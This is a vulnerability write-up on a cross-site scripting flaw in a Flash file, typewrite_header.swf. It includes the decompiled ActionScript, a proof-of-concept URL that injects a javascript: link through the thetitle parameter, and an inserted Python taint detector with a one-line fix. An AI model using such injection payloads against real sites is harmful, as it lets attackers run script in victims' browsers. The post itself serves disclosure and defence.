Flash XSS on typewrite_header.swf

Our lab found an interesting XSS in a .swf file that we later discovered was mainly used on phishing websites.

Source code of typewrite_header.swf:

//----------------------------------------------------------------------
//Frame 3
//----------------------------------------------------------------------
// Loops back to frame 2 so the typewriter effect keeps advancing.
gotoAndPlay (2);

//----------------------------------------------------------------------
//Frame 1
//----------------------------------------------------------------------
var q = 1;
var myurl = "http://xxxxxxxxxxxxxxxxxxxxxxxxx/";
// Both values come straight from the FlashVars / query string,
// so they are attacker-controlled.
var mytext1 = _root.thetitle;
var mytext2 = _root.thestrap;
// The decompiler prints the newline inside the literal as a line break.
_global.mytext = (("" + mytext1) + "\n") + mytext2;

//----------------------------------------------------------------------
//Frame 2
//----------------------------------------------------------------------
if (q <= mytext.length) {
// htmlText renders the untrusted string as HTML, one character more per frame.
textbox.htmlText = mytext.substring(0, q);
q++;
} else {
textbox = mytext;
gotoAndStop (1);
}

So we have two parameters: thetitle and thestrap.

Proof-of-concept:

typewrite_header.swf?thetitle=%3Ca%20href=%27javascript:alert%28document.domain%29%27%3EClick%20me%3C/a%3E&thestrap=xss2 (which will need a click from the user to run the XSS payload)
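The bug above is a plain source-to-sink flow: the FlashVars thetitle and thestrap are read through _root, concatenated into mytext, and written to a TextField's htmlText, which renders markup. The following script is an added example (my own code, not part of the original post or the .swf) that finds that flow in decompiled ActionScript 2. It goes a little beyond this one file: besides htmlText it also flags the navigation sinks getURL, loadMovie, loadMovieNum, navigateToURL and ExternalInterface.call, and it follows taint through intermediate variables and _global assignments. The sample source is the post's decompiled listing, with the split string literal joined as "\n".

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: the decompiled ActionScript 2 from typewrite_header.swf, copied
# from the post with the two halves of the string literal joined as "\n".
SAMPLE_AS2 = """\
//Frame 1
var q = 1;
var myurl = "http://xxxxxxxxxxxxxxxxxxxxxxxxx/";
var mytext1 = _root.thetitle;
var mytext2 = _root.thestrap;
_global.mytext = (("" + mytext1) + "\\n") + mytext2;
//Frame 2
if (q <= mytext.length) {
textbox.htmlText = mytext.substring(0, q);
q++;
} else {
textbox = mytext;
gotoAndStop (1);
}
"""

# Attacker-controlled inputs: FlashVars reached through _root / _level0 in AS2.
SOURCE = re.compile(r'\b(?:_root|_level0)\.([A-Za-z_]\w*)')
# Properties that render HTML when assigned untrusted data.
SINK_PROPERTIES = {"htmlText"}
# Functions that navigate or load code from an attacker-chosen location.
CALL_SINK = re.compile(
    r'\b(getURL|loadMovie|loadMovieNum|navigateToURL|ExternalInterface\.call)\s*\((.*)\)')
# "var x = expr;", "x = expr;" or "_global.x = expr;". The _global prefix is dropped
# because later frames refer to the variable by its bare name (mytext above).
ASSIGN = re.compile(r'^\s*(?:var\s+)?(?:_global\.)?([A-Za-z_][\w.]*)\s*=(?!=)\s*(.+?);\s*$')
STRING_LITERAL = re.compile(r'"(?:[^"\\]|\\.)*"')
# Identifiers not preceded by "." (so "mytext" matches but "substring" does not).
BARE_IDENT = re.compile(r'(?<![\w.])([A-Za-z_]\w*)')


def assignments(src: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, target, rhs) for every simple assignment statement."""
    found = []
    for line_no, line in enumerate(src.splitlines(), 1):
        m = ASSIGN.match(line)
        if m:
            found.append((line_no, m.group(1), m.group(2)))
    return found


def origins_of(expr: str, taint: Dict[str, Set[str]]) -> Set[str]:
    """FlashVar names that can reach `expr`, directly or through tainted variables."""
    found = set(SOURCE.findall(expr))
    for ident in BARE_IDENT.findall(STRING_LITERAL.sub('""', expr)):
        found |= taint.get(ident, set())
    return found


def propagate_taint(src: str) -> Dict[str, Set[str]]:
    """Fixed-point pass: a variable is tainted by every FlashVar that flows into it."""
    taint: Dict[str, Set[str]] = {}
    changed = True
    while changed:
        changed = False
        for _, target, rhs in assignments(src):
            new = origins_of(rhs, taint) - taint.get(target, set())
            if new:
                taint.setdefault(target, set()).update(new)
                changed = True
    return taint


def find_flashvar_sinks(src: str) -> List[Tuple[int, str, List[str]]]:
    """(line_no, sink, flashvars) for each place where FlashVar data reaches a sink."""
    taint = propagate_taint(src)
    findings = []
    for line_no, target, rhs in assignments(src):
        if target.rsplit(".", 1)[-1] in SINK_PROPERTIES:
            hits = origins_of(rhs, taint)
            if hits:
                findings.append((line_no, target, sorted(hits)))
    for line_no, line in enumerate(src.splitlines(), 1):
        for func, args in CALL_SINK.findall(line):
            hits = origins_of(args, taint)
            if hits:
                findings.append((line_no, func + "()", sorted(hits)))
    return sorted(findings)


if __name__ == "__main__":
    for line_no, sink, flashvars in find_flashvar_sinks(SAMPLE_AS2):
        print(f"line {line_no}: {sink} receives FlashVars {', '.join(flashvars)}")
    # Fix for this movie: assign to .text, which renders the string literally.
    print("after fix:", find_flashvar_sinks(SAMPLE_AS2.replace(".htmlText", ".text")))
```

Run against the sample it reports line 9, textbox.htmlText, reached by thestrap and thetitle; with htmlText replaced by text (the TextField property that shows the string verbatim) the same source produces no findings, which is the one-line fix for this movie. The regex-level matching is deliberately simple and only follows straight-line assignments, so it is a triage aid for decompiler output rather than a full parser.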

For more information about Flash XSS please visit https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_%28OTG-CLIENT-008%29

// David Sopas
